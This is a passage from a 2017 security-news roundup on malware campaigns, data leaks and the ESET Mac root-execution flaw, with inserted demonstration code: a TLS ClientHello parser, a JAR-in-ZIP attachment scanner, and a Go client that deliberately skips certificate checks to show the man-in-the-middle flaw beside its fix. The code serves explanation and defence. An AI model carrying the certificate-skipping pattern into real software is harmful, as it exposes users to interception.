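    body += struct.pack("!H", len(extensions)) + extensions
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    # Record layer: content type, record version (0x0301 for compatibility), length.
    return bytes([HANDSHAKE]) + struct.pack("!HH", 0x0301, len(handshake)) + handshake


def parse_client_hello(record: bytes):
    """Return (legacy_version, supported_versions list or None)."""
    content_type, _record_version, _length = struct.unpack("!BHH", record[:5])
    if content_type != HANDSHAKE or record[5] != CLIENT_HELLO:
        raise ValueError("not a ClientHello")
    body_len = int.from_bytes(record[6:9], "big")
    body = record[9:9 + body_len]
    legacy_version = struct.unpack("!H", body[:2])[0]
    off = 2 + 32                                              # skip random
    off += 1 + body[off]                                      # skip session id
    cs_len = struct.unpack("!H", body[off:off + 2])[0]
    off += 2 + cs_len                                         # skip cipher suites
    off += 1 + body[off]                                      # skip compression methods
    supported = None
    if off + 2 <= len(body):
        ext_total = struct.unpack("!H", body[off:off + 2])[0]
        off += 2
        end = off + ext_total
        while off + 4 <= end:
            ext_type, ext_len = struct.unpack("!HH", body[off:off + 4])
            data = body[off + 4:off + 4 + ext_len]
            off += 4 + ext_len
            if ext_type == SUPPORTED_VERSIONS_EXT:
                count = data[0]
                supported = [struct.unpack("!H", data[1 + i:3 + i])[0]
                             for i in range(0, count, 2)]
    return legacy_version, supported


def version_seen_by_legacy_parser(record: bytes) -> int:
    """A device that trusts only the legacy field sees 1.2 for every TLS 1.3 client."""
    return parse_client_hello(record)[0]


def version_seen_by_rfc_parser(record: bytes) -> int:
    """RFC 8446 section 4.2.1: supported_versions, when present, is authoritative."""
    legacy, supported = parse_client_hello(record)
    return max(supported) if supported else legacy


def compare_views(record: bytes) -> dict:
    legacy = version_seen_by_legacy_parser(record)
    offered = version_seen_by_rfc_parser(record)
    return {"legacy_field": hex(legacy), "highest_offered": hex(offered),
            "views_disagree": legacy != offered}


if __name__ == "__main__":
    print("TLS 1.3 client:", compare_views(build_client_hello([TLS_1_3, TLS_1_2])))
    print("TLS 1.2 client:", compare_views(build_client_hello([])))
```

A middlebox that decides how to handle the connection from the legacy field alone therefore treats a TLS 1.3 hello as an ordinary 1.2 one and only learns otherwise once the rest of the handshake no longer looks the way it expects.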

According to Google, Blue Coat was informed of TLS 1.3 several months ago, but the company failed to properly test its software. SecurityWeek has reached out to Symantec for comment and will update this article if the company responds.

A study conducted recently by researchers from Mozilla, Google, CloudFlare and various universities showed that many antiviruses and network appliances that intercept TLS connections for visibility into encrypted traffic weaken security and introduce vulnerabilities.

The study found that only Blue Coat’s ProxySG product maintained an optimal TLS connection, but those tests were conducted on TLS 1.2.

TLS 1.3 is still under development, but a final version is expected soon. The new version of the protocol improves speed and eliminates some of the features that have been leveraged in the TLS attacks disclosed over the past years.


Windows 10 Option to Block Installation of Win32 Apps

28.2.2017 securityweek Safety

Windows 10 could soon allow users to block the installation of applications coming from other sources than the Microsoft Store, a feature that would likely help prevent the installation of malware.

The feature, which would essentially prevent users from installing Win32 applications, is said to be currently being tested as part of the latest build pushed to users in the Insider Preview program (Windows 10 build 15042).

Win32 is the core set of application programming interfaces (APIs) available in the Microsoft Windows operating systems and is often referred to as the Windows API. In addition to Win32 apps, however, Windows 10 users can also install software built using Microsoft’s Universal Windows Platform, or UWP.

This new platform is the framework for applications that support not only Windows 10 computers, but also other devices running under the platform, such as Xbox One, HoloLens, and phones. Microsoft Store, the app portal accessible from all these devices, only accepts UWP applications, and the tech company even released a converter to help developers port Win32 apps to UWP.

With millions of Win32 applications available out there, it might take a while before all developers switch to the new framework, especially if users aren’t in a hurry to embrace UWP applications.

What the newly observed change does is let users block Win32 apps from being installed, by selecting an option to “Allow apps from the Store only” from Windows 10’s Apps & Features settings screen. According to Vitor Mikaelson, even when this option is selected, already installed Win32 apps will be allowed to run normally.

The option is expected to become available in all Windows 10 editions once the Creators Update arrives in April, which will also allow enterprise users to benefit from it. Basically, admins will be able to install the necessary apps and then turn the feature on to keep unwanted applications away. This option will essentially prevent malware from being installed on Windows 10 devices, either with or without the user’s consent, unless it is being distributed via Microsoft Store.

The upcoming feature will also offer options to allow applications from anywhere without warning, or to prefer those from the Microsoft Store but still allow those from other sources (which will trigger a prompt informing users that they are installing applications that are not from the Windows Store).


Adwind RAT Campaign Hits Organizations Worldwide: Kaspersky

28.2.2017 securityweek Virus
A recently observed massive campaign using the Adwind Remote Access Tool (RAT) has hit over 1,500 organizations in over 100 countries and territories, a recent report from Kaspersky Lab warns.

The attacks were spread across industries, Kaspersky says, though the retail and distribution sector was hit the most (20.1%), followed by architecture and construction (9.5%), shipping and logistics (5.5%), insurance and legal services (5%), and consulting (5%).

The Adwind backdoor has been around for several years, and Kaspersky said last year that it managed to infect over 443,000 users between 2013 and 2016. Also known as AlienSpy, Frutas, Unrecom, Sockrat and jRAT, the malware has been associated with numerous attacks, with the AlienSpy variant discontinued in April 2015 after a report detailing it was published.

The threat is openly distributed in the form of a paid service, where any customer can use the malicious program by paying a fee. According to Kaspersky, this is the main feature that distinguishes the Adwind RAT from other commercial malware.

Written in Java, the malware isn’t restricted to a single platform, but can be used to target Windows, Linux, and macOS, as well as other platforms that run Java, including Android. With the help of this threat, cybercriminals can log keystrokes, steal passwords and other data from web forms, capture screenshots, record audio and video, transfer files, and steal a great deal of confidential information as well.

As part of the newly detailed campaign, the RAT is being distributed via emails supposedly coming from the HSBC Advising Service (from the mail.hsbcnet.hsbc.com domain), purporting that payment advice has been included in an attachment. Although detailed only now, the activity of this email domain has been tracked back to 2013, Kaspersky Lab researchers say.

Once the victim opens the attachment, however, a malware sample is installed on the machine. The attachment comes in the form of a .ZIP file that includes a JAR inside. When the user opens it, the malware self-installs, after which it attempts to establish communication with the command and control (C&C) server.
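The delivery shape described above, a ZIP attachment carrying a JAR, is something a mail gateway can recognise before a user ever opens it. This added example (not Kaspersky's code) builds a constructed lure of that shape and a benign control, then walks the archive, descending into nested ZIP-format members, and flags Java payload evidence: a META-INF manifest, a Main-Class entry that makes the JAR runnable, .class files, and .jar member names. The file names and contents are constructed.

```python
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"          # local file header; a JAR is a ZIP and starts the same way
CLASS_MAGIC = b"\xca\xfe\xba\xbe"   # Java class file signature
MAX_MEMBER_BYTES = 50_000_000       # refuse to inflate oversized members (zip-bomb guard)


def build_lure_attachment() -> bytes:
    """Constructed sample in the article's shape: outer ZIP wrapping a runnable JAR."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as j:
        j.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Loader\n")
        j.writestr("Loader.class", CLASS_MAGIC + bytes(16))          # magic plus filler
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Payment_Advice.jar", jar.getvalue())             # constructed name
    return outer.getvalue()


def build_benign_attachment() -> bytes:
    """Constructed control: a ZIP holding a (placeholder) PDF only."""
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("invoice.pdf", b"%PDF-1.4 constructed placeholder")
    return outer.getvalue()


def jar_indicators(data: bytes) -> list:
    """Evidence that a ZIP-format blob is really a Java archive."""
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            if "META-INF/MANIFEST.MF" in names:
                hits.append("manifest present")
                manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
                if "Main-Class:" in manifest:
                    hits.append("manifest declares Main-Class (runnable JAR)")
            for name in names:
                if name.lower().endswith(".class"):
                    hits.append(f"class file {name}")
    except zipfile.BadZipFile:
        hits.append("ZIP signature but archive does not parse")
    return hits


def inspect_attachment(data: bytes, depth: int = 0, max_depth: int = 2) -> list:
    """Collect findings for an attachment, recursing into nested ZIP-format members."""
    findings = []
    if not data.startswith(ZIP_MAGIC):
        return findings
    findings += [f"depth {depth}: {hit}" for hit in jar_indicators(data)]
    if depth >= max_depth:
        return findings
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for info in z.infolist():
                if info.filename.lower().endswith(".jar"):
                    findings.append(f"depth {depth}: member {info.filename} has .jar extension")
                if info.file_size > MAX_MEMBER_BYTES:
                    findings.append(f"depth {depth}: member {info.filename} too large to inspect")
                    continue
                member = z.read(info.filename)
                if member.startswith(ZIP_MAGIC):
                    findings += inspect_attachment(member, depth + 1, max_depth)
    except zipfile.BadZipFile:
        pass
    return findings


def verdict(data: bytes) -> str:
    return "block: Java payload inside archive" if inspect_attachment(data) else "allow"


if __name__ == "__main__":
    for label, blob in [("lure", build_lure_attachment()), ("benign", build_benign_attachment())]:
        print(label, "->", verdict(blob))
        for line in inspect_attachment(blob):
            print("   ", line)
```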

Once a computer has been compromised with the Adwind backdoor, the malware’s operators have virtually complete control over it. This also allows them to immediately start stealing confidential information from the machine.

While analyzing the threat, Kaspersky has established that more than 40% of the targeted users live in ten countries: Malaysia, UK, Germany, Lebanon, Turkey, Hong Kong, Kazakhstan, United Arab Emirates, Mexico, and Russia.

Kaspersky Lab researchers also suggest that the cybercriminals behind these attacks might be using industry-specific mailing lists to target their attacks, considering that a high proportion of their victims are businesses. “Considering the number of detections, they were focused on attack scale and outreach, rather than on sophisticated technology,” the researchers also say.


"Gamaredon" Group Uses Custom Malware in Ukraine Attacks

28.2.2017 securityweek Virus
A Russia-linked threat group tracked as “Gamaredon” has been using custom-developed malware in attacks aimed at Ukraine, Palo Alto Networks reported on Monday.

The group has been active since at least mid-2013, but its activities were first detailed in April 2015 by LookingGlass. The security firm’s analysis focused on Operation Armageddon, a cyber espionage campaign targeting Ukrainian government, military and law enforcement officials.

The Security Service of Ukraine (SBU) issued a statement at the time attributing the attacks to branches of Russia's Federal Security Service (FSB). Furthermore, evidence found by researchers suggested that the malware used by the threat actor had been built on a Russian operating system.

In the attacks analyzed by LookingGlass in 2015, the Gamaredon group used spear-phishing emails to deliver common remote access tools (RATs), such as Remote Manipulator System (RMS) and UltraVNC.

According to Palo Alto Networks, Gamaredon has started using new, custom-built malware instead of the widely available RATs. However, it’s unclear if the latest attacks are also part of Operation Armageddon or if they represent a new campaign.

The new pieces of malware used by the group are capable of downloading and executing additional payloads, scanning infected systems for specific files, capturing screenshots, and executing remote commands. While the actor’s older tools were easily identified by antimalware products (e.g. TROJ_GAMAREDON, Trojan.Gamaredon), its new creations often go undetected or unrecognized.

“We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes,” said Palo Alto Networks researchers.

One of the custom backdoors used by Gamaredon is Pteranodon, which can capture screenshots, download and execute files, and execute commands on the system.

While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.

Russia-linked threat groups have been blamed for several campaigns targeting Ukrainian organizations, including damaging attacks on the country’s energy sector.


Prisons and Courts Bill allows mobile networks to deploy IMSI catchers outside of prisons
28.2.2017 securityaffairs Mobile

The new UK Prisons and Courts Bill, introduced to Parliament last week, will let mobile networks deploy IMSI catchers outside of prisons to snoop on mobile phone users.

The IMSI catchers are surveillance equipment used for intercepting mobile phone traffic, calls, tracking movements of mobile phone users block phones from operating.

An IMSI catcher runs a Man in the Middle (MITM) attack acting as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers.

The deployment of IMSI catchers aims to prevent, detect or investigate the use of mobile phones in prisons.


The measure is a novelty because, until now, the use of IMSI catchers under the Prisons (Interference with Wireless Telegraphy) Act 2012 was restricted to within prison walls.

The decision represents a threat to the privacy of citizens; privacy advocates point out that IMSI catchers enable dragnet surveillance.

Clause 21 of the bill, along with its Schedule 2, will amend the Prisons (Interference with Wireless Telegraphy) Act 2012 to allow the Justice Secretary to authorize “interference with wireless telegraphy”.

“The Secretary of State may authorise a public communications provider to interfere with wireless telegraphy. An interference with wireless telegraphy authorised under subsection may be carried out only for the purpose of preventing the use within a relevant institution in England and Wales of an item specified in subsection, or detecting or investigating the use within a relevant institution in England and Wales of such an item,” reads Clause 21.

The measure will allow the detection of illegal use of mobile devices by prisoners illicitly communicating with people outside.

In October 2016, it was publicly disclosed that UK police had purchased this mobile phone snooping technology to track suspects’ devices and intercept their communications as part of their investigations.

According to the Bristol Cable, UK police are using Stingray equipment in their operations. Law enforcement has reportedly purchased “covert communications data capture” (CCDC) equipment from the UK firm Cellxion.

The Metropolitan Police has been operating IMSI catchers for a long time, and it has also used a surveillance aircraft fitted with such equipment.

“The Metropolitan Police in particular has been operating IMSI catchers, along with a covert air wing run through a front company registered to an anonymous mailbox in South London, since at least 2011,” states El Reg. “The Met’s surveillance aircraft, a twin-engined Cessna Caravan F406 with the registration G-BVJT, is a familiar sight to Londoners. It is thought the aircraft’s surveillance fit includes IMSI catchers and live mobile phone tracking and eavesdropping capability.”


Boeing notified 36,000 employees following an accidental data leak
28.2.2017 securityaffairs Incident

A Boeing employee inadvertently leaked the personal information of 36,000 co-workers late last year; the aerospace giant is now notifying them of the incident.
The aerospace giant Boeing is notifying 36,000 employees following an accidental data leak. A company employee inadvertently leaked the personal information of his co-workers late last year when he emailed a company spreadsheet to his spouse, who did not work at the company.

The file shared by the man contained sensitive, personally identifiable information of 36,000 Boeing employees, including names, places of birth, BEMSID (employee ID numbers), and accounting department codes.

The data leak was publicly disclosed earlier in February, after Boeing’s Deputy Chief Privacy Officer Marie Olson reported the breach to Washington State Attorney General Bob Ferguson.


According to Olson, the spreadsheet also included “hidden columns” containing social security numbers and dates of birth.

According to the breach notification, the incident occurred on Nov. 21, 2016 and was discovered on Jan. 9, but Boeing only began notifying those affected on Feb. 8.

In response to the breach, Boeing has had the copies of the spreadsheet on both the employee’s computer and his spouse’s PC destroyed.

“Both the employee and his spouse have confirmed to us that they have not distributed or used any of the information,” reads the Boeing breach notification.

Boeing experts don’t believe the data has been used inappropriately; nonetheless, the company is offering employees two years of access to a free identity theft protection service.

To avoid similar incidents in the future, the company plans to require additional training for its employees on how to handle sensitive data and to implement additional controls on sensitive information.

Unfortunately, this isn’t the first time the company has suffered such incidents: in several cases, laptops containing sensitive data were stolen. In December 2006, thieves stole a laptop containing data on 382,000 employees.


A flaw in ESET Endpoint Antivirus allows hacking of Apple Macs, patch it now
28.2.2017 securityaffairs Vulnerability

A flaw in ESET Endpoint Antivirus is exploitable to get remote root execution on Apple Mac systems via Man-In-The-Middle (MiTM) attacks.
According to the security advisory published by Google Security Team’s Jason Geffner and Jan Bee on Seclists, it is possible to get remote root execution on Apple Mac systems via Man-In-The-Middle (MiTM) attacks. The attackers can get root-level remote code execution on a Mac by intercepting the ESET antivirus package’s connection to company backend servers. The attack is possible due to the presence of a buffer overflow vulnerability in the XML library tracked as CVE-2016-0718.

“Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an outdated XML parsing library and do not perform proper server authentication, allowing for remote unauthenticated attackers to perform arbitrary code execution as root on vulnerable clients.” reads the advisory.

According to the experts, the attack is possible because the esets_daemon uses an old version of POCO’s XML parser library that is affected by the buffer overflow vulnerability.


The researchers discovered that esets_daemon, which uses the flawed library, also handles license activation with a request to the following static address:

https://edf.eset.com/edf.

When ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a request to the above address, but it doesn’t validate the web server’s certificate, opening the door to a man-in-the-middle attack.

An attacker can intercept the request and present ESET Endpoint Antivirus with a self-signed HTTPS certificate; the esets_daemon service then parses the response as an XML document.

At this point the attacker can supply a specially crafted XML document that triggers CVE-2016-0718 to achieve arbitrary code execution as root.

“When ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a request to https://edf.eset.com/edf. The esets_daemon service does not validate the web server’s certificate, so a man-in-the-middle can intercept the request and respond using a self-signed HTTPS certificate.” reads the security advisory. “The esets_daemon service parses the response as an XML document, thereby allowing the attacker to supply malformed content and exploit CVE-2016-0718 to achieve arbitrary code execution as root.”

The security duo has also published proof-of-concept code for the attack.

ESET has promptly fixed the issue in ESET Endpoint Antivirus version 6.4.168.0.

Update your system as soon as possible.


The Singaporean Defence Ministry was hit by a cyber attack, no secrets were exfiltrated
28.2.2017 securityaffairs BigBrothers

The Singaporean Defence Ministry confirmed that threat actors have breached government systems stealing personal information of its employees.
On Tuesday, the Defence Ministry confirmed that unknown hackers had breached a government system and stolen personal information belonging to about 850 Singapore national servicemen and employees.

Data accessed by hackers includes telephone numbers, dates of birth, and national ID numbers.

According to the Singaporean Defence Ministry the hackers were searching for official secrets.

The Singaporean Defence Ministry discovered the security breach this month; the hackers penetrated the I-net system, which provides Internet access to national servicemen and employees for their personal communications and Internet surfing.

I-net computer terminals are used in both MINDEF and Singapore Armed Forces (SAF) camps and premises. The nature of the attack suggests to investigators that the attackers were politically motivated.

According to the ministry, the hackers haven’t exfiltrated classified military information because it is not accessible from the I-net.

“Classified matters in MINDEF/SAF use a different computer system with more stringent security features and are not connected to the Internet,” the official statement published on its website stated.

“The attack on I-net appeared to be targeted and carefully planned,” it said.

“The real purpose may have been to gain access to official secrets, but this was prevented by the physical separation of I-net from our internal systems,” MINDEF added.

“We will continually strengthen our cyber defenses as the level of targeted attacks is expected to continue and rise.”

The ministry told the Cyber Security Agency and the Government Technology Agency to extend the investigation to other government systems; fortunately, at the time I was writing, no other security breach had been discovered by the experts.

In mid-2015, the Government of Singapore announced the separation of civil servants’ work computers from the Internet in order to secure government networks. The measure was aimed at preventing cyber attacks that could inject malware into the government email network.

The local news agency The Straits Times reported that the measure impacted some 100,000 computers.

Even before the announcement a number of ministries in Singapore, including the defence and the foreign affairs ministries, had been using separate systems to access the Internet.


Government and national infrastructure are privileged targets for hackers: in 2014, a section of the prime minister’s website, as well as the website of the presidential residence, were targeted by unknown attackers.

In December 2015, experts at FireEye discovered a stealthy botnet relying on a backdoor called LATENTBOT that had compromised companies around the world, including in Singapore. In January, a new variant of the infamous Tinba banking trojan emerged in the wild and targeted financial institutions in the Asia Pacific region, including Singapore.



70+ Cyber Security Micro-Courses and Certifications To Boost Your IT Career
28.2.2017 thehackernews Cyber

With the evolving hacking events around us, cyber-security skills are in high demand across all organizations and industries, because a shortage of skilled cyber security practitioners could leave an organization vulnerable to cyber attacks.
But knowledge alone is not sufficient; certification also matters, as it shows employers that you are serious about your career and have demonstrated your technical ability in some form.
I frequently receive emails and messages from my readers asking: Should I get certified? Are certifications important to build up a career in IT? What certifications can one get to start a career in information security? And more.
These are some of the most frequent queries I came across, and in this article, I will attempt to answer these along with a solution on how to get started.
Whether you are looking to launch your career in the IT industry, or perhaps get promoted at your current job — getting certified is a great way to market yourself.
Certifications play a major role in any industry, as almost every organization hires IT professionals with practical knowledge as well as professional certifications which provide a measurement of your skills and knowledge.
This is why it's important to earn certificates in your field.
Cyber Security Micro Courses and Certifications
Cybrary, one of the most popular and highly rated free online IT and cyber security training companies, has recently launched around 80 Cyber Security Micro Courses and Certifications in an effort to combat the global shortage of talent in the cyber security profession.
Created by the Cybrary Education Committee, all Micro Courses and Certifications are categorized into Beginner, Intermediate and Advanced levels, giving users a thorough deep dive into the most critical skills in the field.
Usually one has to pay thousands of dollars for classes and then thousands for certification exams, but the good news is that all Cybrary's Micro Courses are free and Certification exams are conducted online at the cost of just $10 each — with one free retake per exam.
"The Cybrary community is working to make cybersecurity training available to anyone who wants it, anywhere. Training should not be exclusive to those who can afford to pay $5,000 per class. The same applies to certifications," said Ryan Corey, co-founder, Cybrary.
"Certifications are imperative to a cybersecurity career, and it’s important that we provide accessible and affordable education paths that will help reverse the growing need for skilled cybersecurity professionals."
Here's the list of some selected certification courses that grabbed my attention and are important in the IT field:
Cryptography
Network Devices
Software Development Security
Security Architecture Fundamentals
Mobile Device Security Fundamentals
Incident Response & Advanced Forensics
Security Assessment & Testing Certification
Malware Fundamentals Certification Course
Cybrary also provides free practice tests, so that users can test their capabilities and then finally apply for the actual certification exams.
So, go and grab the cyber security and network security certification courses that best suit your requirements. The Hacker News readers can use code FREESCT1 for their first free certification exam.


Internet-Connected Teddy Bear Leaks Millions Of Voice Messages and Password
28.2.2017 thehackernews Hacking

Every parent should think twice before handing out Internet-connected toys or smart toys to their children, as these creepy toys pose a different sort of danger: privacy and data security risks for kids who play with them.
A similar incident happened over a year ago when Hong Kong toymaker VTech was hacked, exposing the personal details, including snaps of parents and children and chat logs, of about 6.4 million children around the world.
Now, in the latest security failing of the internet-connected smart toys, more than 2 Million voice recordings of children and their parents have been exposed, along with email addresses and passwords for over 820,000 user accounts.
And What's even Worse? The hackers locked this data and held it for Ransom.
California-based Spiral Toys’ line of internet-connected stuffed animal toys, CloudPets, which allow children and relatives to send recorded voice messages back and forth, reportedly exposed the voice messages recorded between parents and children, along with other personal data, to online hackers.
Cloudpets' Data was Held for Ransom
The customer data was left unprotected from 25 December 2016 to 8 January in a publicly available database that wasn't protected by any password or a firewall, according to a blog post published Monday by Troy Hunt, creator of the breach-notification website Have I Been Pwned?.
Hunt said that the exposed data was accessed multiple times by many third parties, including hackers who accessed and stole customer emails and hashed passwords from a CloudPets database.

In fact, in early January, when cyber criminals were actively scanning the Internet for exposed or badly-configured MongoDB databases to delete their data and ultimately hold it for ransom, CloudPets' database was overwritten twice.
Toy Maker was Notified of the Breach Multiple Times
The worst part comes in when any company is notified of some issue, but it doesn't give a shit to protect its customers. Spiral Toys did the same.
The toy maker was allegedly notified four times that its customer data was online and available for anyone to have their hands on — yet the data remained up for almost a week with evidence suggesting that the data was stolen on multiple occasions.
Interestingly, the CloudPets blog hasn't been updated since 2015, and there is not any public notice about the security concerns.
"It is impossible to believe that CloudPets (or mReady, [a Romanian company which Spiral Toys appears to have contracted with to store its database]) did not know that firstly, the databases had been left publicly exposed and secondly, that malicious parties had accessed them," Hunt said.
"Obviously, they have changed the security profile of the system, and you simply could not have overlooked the fact that a ransom had been left. So both the exposed database and intrusion by those demanding the ransom must have been identified yet this story never made the headlines."
While voice recordings were not kept on the open MongoDB databases, Spiral Toys used an open Amazon-hosted service that required no authorization to store the recordings, user profile pictures, children's names, and their relations to parents, relatives, and friends.
This eventually means that anyone with malicious intent could listen to the recordings by only guessing the correct URL.
Affected? How to Check and What to Do?
This incident is perhaps something to be kept in mind the next time you are shopping for the latest internet-connected smart toy for your kid.
If you are a parent holding a CloudPets account, you are advised to check the Have I Been Pwned? website, which compiles data from breaches and now includes the user accounts stolen from Spiral Toys.
If you found your account affected, you should change your password immediately and consider disconnecting the toy from the internet.
You are also advised to change the passwords on any other online accounts for which you are using the same password as for CloudPets account.


Critical Flaw in ESET Antivirus Exposes Mac Users to Remote Hacking
28.2.2017 thehackernews Vulnerability

What could be more exciting for hackers than exploiting a vulnerability in a widely used software without having to struggle too much?
One such easy-to-exploit, but critical vulnerability has been discovered in ESET's antivirus software that could allow any unauthenticated attackers to remotely execute arbitrary code with root privileges on a Mac system.
The critical security flaw, tracked as CVE-2016-9892, in ESET Endpoint Antivirus 6 for macOS was discovered by Google Security Team's researchers Jason Geffner and Jan Bee at the beginning of November 2016.
As detailed in the full disclosure, all a hacker needs to get root-level remote code execution on a Mac computer is to intercept the ESET antivirus package's connection to its backend servers using a self-signed HTTPS certificate, put himself in as a man-in-the-middle (MITM) attacker, and exploit an XML library flaw.
The actual issue was related to a service named esets_daemon, which runs as root. The service is statically linked with an outdated version of the POCO XML parser library, version 1.4.6p1 released in March 2013.
This POCO version is based on a version of the Expat XML parser library version 2.0.1 from 2007, which is affected by a publicly known XML parsing vulnerability (CVE-2016-0718) that could allow an attacker to execute arbitrary code via malicious XML content.
Now, when esets_daemon sends a request to https://edf.eset.com/edf during activation of the ESET Endpoint Antivirus product, an MITM attacker can intercept the request and deliver a malformed XML document using a self-signed HTTPS certificate.
This triggers the CVE-2016-0718 flaw, which executes the malicious code with root privileges when esets_daemon parses the XML content.
This attack was possible because the ESET antivirus did not validate the web server's certificate.
Here's what the duo explains:
"Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an outdated XML parsing library and do not perform proper server authentication, allowing for remote unauthenticated attackers to perform arbitrary code execution as root on vulnerable clients."
Now since the hacker controls the connection, they can send malicious content to the Mac computer in order to hijack the XML parser and execute code as root.
The Google researchers have also released the proof-of-concept (PoC) exploit code, which only shows how the ESET antivirus app can be used to cause a crash.
ESET addressed this vulnerability on February 21 by upgrading the POCO parsing library and by configuring its product to verify SSL certificates.
The patch is made available in the release of version 6.4.168.0 of ESET Endpoint Antivirus for macOS. So, make sure your antivirus package is patched up to date.
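The failure described in both ESET write-ups above (a client that skips server certificate validation and hands whatever comes back to its XML parser) and the fix, as an added Go example that is neither ESET's code nor the researchers' PoC. It assumes a constructed activation reply, stands up two local self-signed HTTPS servers (one playing the genuine backend, one the man-in-the-middle), and uses edf.eset.com only as a certificate name; the three client modes show the vulnerable behaviour, the fix, and a stricter pinned variant.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"io"
	"math/big"
	"net"
	"net/http"
	"net/http/httptest"
	"time"
)

// Constructed stand-ins for the activation reply; the real edf.eset.com
// exchange is not documented on the page, so these are assumptions.
const (
	legitResponse = `<?xml version="1.0"?><activation status="ok"/>`
	rogueResponse = `<?xml version="1.0"?><activation><!-- attacker-chosen XML --></activation>`
)

// selfSignedCert mints a throwaway self-signed certificate for 127.0.0.1,
// exactly what a man-in-the-middle can produce at will.
func selfSignedCert() tls.Certificate {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62))
	tmpl := &x509.Certificate{
		SerialNumber: serial,
		Subject:      pkix.Name{CommonName: "edf.eset.com"},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(time.Hour),
		IPAddresses:  []net.IP{net.IPv4(127, 0, 0, 1)},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}
}

// newBackend starts a local HTTPS server with its own self-signed certificate
// that answers every request with body (genuine backend or MITM, as needed).
func newBackend(body string) *httptest.Server {
	srv := httptest.NewUnstartedServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
		w.Header().Set("Content-Type", "text/xml")
		io.WriteString(w, body)
	}))
	srv.TLS = &tls.Config{Certificates: []tls.Certificate{selfSignedCert()}}
	srv.StartTLS()
	return srv
}

// ClientMode selects how the activation client authenticates the server.
type ClientMode int

const (
	NoVerify    ClientMode = iota // the flaw on the page: any certificate accepted
	SystemRoots                   // the fix: chain must end at a trusted root
	PinnedRoot                    // stricter: only the operator's own certificate
)

func newClient(mode ClientMode, pinned *x509.Certificate) *http.Client {
	cfg := &tls.Config{MinVersion: tls.VersionTLS12}
	switch mode {
	case NoVerify:
		cfg.InsecureSkipVerify = true // disables chain and hostname checks
	case PinnedRoot:
		pool := x509.NewCertPool()
		pool.AddCert(pinned)
		cfg.RootCAs = pool
	}
	return &http.Client{Transport: &http.Transport{TLSClientConfig: cfg}, Timeout: 5 * time.Second}
}

// fetchActivation plays esets_daemon: GET the activation URL and return the
// body that a vulnerable build would feed straight into its XML parser.
func fetchActivation(c *http.Client, url string) (string, error) {
	resp, err := c.Get(url)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return string(body), err
}

func main() {
	legit, rogue := newBackend(legitResponse), newBackend(rogueResponse)
	defer legit.Close()
	defer rogue.Close()
	for _, m := range []ClientMode{NoVerify, SystemRoots, PinnedRoot} {
		body, err := fetchActivation(newClient(m, legit.Certificate()), rogue.URL)
		fmt.Printf("mode %d vs. rogue server: body=%q err=%v\n", m, body, err)
	}
}
```

Only the NoVerify client ever receives the rogue body; the other two fail the handshake with an unknown-authority error before any XML reaches the parser.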


Multiple Groups Cooperated in Shamoon Attacks: Symantec

27.2.2017 securityweek Virus

The recent attacks involving the notorious disk-wiping malware Shamoon, aka Disttrack, may have been carried out by multiple groups working together under the command of a single entity, Symantec said on Monday.

A total of three Shamoon 2 attack waves were observed recently, including two in November 2016 and one on January 23. The attacks, believed by many to be the work of Iran, targeted organizations in the Persian Gulf, particularly Saudi Arabia.

Experts have identified connections between apparently different threat groups and the Shamoon attacks. First, Symantec reported that an actor tracked by the company as Greenbug may have helped obtain credentials used in the Shamoon operation.

Later, Palo Alto Networks published a report on Magic Hound, a campaign targeted at energy, government and technology sector organizations that are located or have an interest in Saudi Arabia. The operation involved domains and a RAT linked by IBM to Shamoon attacks.

Researchers also found connections between the Magic Hound attacks and two other Iran-linked advanced persistent threat (APT) actors: Charming Kitten (Newscaster) and Rocket Kitten. Symantec tracks the group behind Magic Hound as Timberworm, and SecureWorks has named it COBALT GYPSY.

Symantec said Timberworm apparently facilitated the January 2017 Shamoon attacks. The group, similar to Greenbug, gained access to the targeted organizations’ systems weeks or months before Shamoon was deployed in order to conduct reconnaissance, harvest credentials and establish persistent remote access.

Timberworm used spear-phishing emails and weaponized documents to gain a foothold in each organization’s network. The attacker then leveraged custom malware, hacking tools and legitimate sysadmin applications to achieve its goals. The use of legitimate tools can help avoid detection and makes attribution more difficult.

Both Greenbug and Timberworm penetrated the systems of many organizations – not only in Saudi Arabia – but the Shamoon worm was only deployed against specific targets.

“Timberworm appears to be a much larger operation, infiltrating a much broader range of organizations beyond those affected by the recent Shamoon attacks. Similarly, Greenbug targeted a range of organizations in the Middle East beyond those affected by Shamoon, including companies in the aviation, energy, government, investment, and education sectors,” said Symantec researchers.

“While both groups leveraged two distinct toolsets, their targets, tactics, and procedures align very well and in close proximity to the coordinated wiping events,” they added.

The evidence suggests that the groups worked together and their activities may have been orchestrated by a single entity, experts said.


The Necurs botnet is evolving, now includes a DDoS module
